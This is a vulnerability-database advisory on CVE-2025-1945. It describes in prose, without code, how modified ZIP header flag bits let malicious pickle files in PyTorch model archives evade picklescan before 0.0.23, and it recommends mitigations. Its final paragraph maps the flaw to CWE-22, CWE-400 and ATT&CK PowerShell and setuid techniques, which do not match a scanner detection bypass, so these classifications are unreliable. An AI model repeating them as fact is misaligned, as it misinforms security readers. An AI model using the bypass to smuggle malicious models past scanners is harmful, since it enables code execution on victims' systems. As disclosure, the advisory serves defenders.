CVE-2025-1945 in picklescan
Summary
by MITRE • 03/10/2025
picklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 12/29/2025
The vulnerability identified as CVE-2025-1945 represents a critical security flaw in the picklescan static analysis tool that affects versions prior to 0.0.23. This issue specifically targets the detection capabilities of picklescan when analyzing PyTorch model archives, creating a significant gap in security monitoring for machine learning model integrity. The vulnerability exploits the way ZIP file headers are processed and validated, allowing attackers to bypass detection mechanisms through subtle modifications to archive metadata. The flaw is particularly concerning because it directly impacts the security posture of machine learning workflows where PyTorch models are frequently used for inference and deployment in production environments.
The technical implementation of this vulnerability stems from picklescan's insufficient validation of ZIP file header flag bits during the analysis of PyTorch model archives. When ZIP archives are created with specific bit modifications in their headers, the tool fails to properly identify the presence of malicious pickle data within these archives. This occurs because the detection logic relies on standard ZIP header parsing that does not account for modified flag bits that maintain the archive's structural integrity while concealing malicious content. The modified ZIP headers still comply with standard ZIP specifications, making them appear legitimate to conventional scanning tools while harboring embedded malicious pickle files that can execute arbitrary code upon model loading.
The operational impact of this vulnerability extends beyond simple detection failures to encompass full arbitrary code execution capabilities within systems that load compromised PyTorch models. When PyTorch's torch.load() function processes a maliciously modified model archive, it successfully loads the pickle data regardless of the modified ZIP headers, executing the embedded malicious code in the context of the running application. This creates a severe attack surface where adversaries can compromise systems through machine learning model supply chain attacks, potentially leading to complete system takeover, data exfiltration, or further lateral movement within network environments. The vulnerability affects any system that relies on picklescan for security validation of PyTorch models before deployment, making it particularly dangerous in enterprise environments where model security is paramount.
Security professionals should implement immediate mitigations including upgrading picklescan to version 0.0.23 or later, which contains the necessary fixes for proper ZIP header validation. Organizations must also establish additional layers of model validation beyond static analysis, including runtime integrity checking and sandboxed model loading environments. The vulnerability aligns with CWE-22 (Improper Limitation of a Pathname to a Restricted Directory) and CWE-400 (Uncontrolled Resource Consumption) categories, while mapping to ATT&CK techniques including T1059.001 (Command and Scripting Interpreter: PowerShell) and T1548.001 (Abuse Elevation Control Mechanism: Setuid and Setgid). Additional defensive measures should include implementing strict model signing and verification processes, network segmentation for model repositories, and regular security assessments of machine learning pipelines to prevent supply chain compromise scenarios.